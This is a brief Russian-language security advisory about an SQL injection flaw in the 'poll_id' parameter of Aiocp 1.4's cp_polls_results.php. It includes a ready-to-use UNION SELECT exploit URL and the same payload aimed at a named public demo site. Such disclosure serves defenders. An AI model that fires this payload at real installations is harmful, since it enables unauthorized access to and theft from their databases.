Программа: Aiocp 1.4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «poll_id» сценарием cp_polls_results.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6—

Демонстрация:

http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?
poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6—



Оставить мнение